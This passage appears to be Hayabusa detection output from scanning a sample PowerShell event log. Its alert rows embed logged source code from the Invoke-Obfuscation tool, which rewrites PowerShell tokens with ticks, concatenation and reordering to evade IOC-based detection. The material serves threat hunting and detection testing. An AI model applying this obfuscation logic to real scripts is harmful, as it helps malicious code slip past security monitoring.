value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default 
{Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. 
$ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. 
Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. 
""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. 
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. 
If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. 
$TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. 
If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). 
If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. 
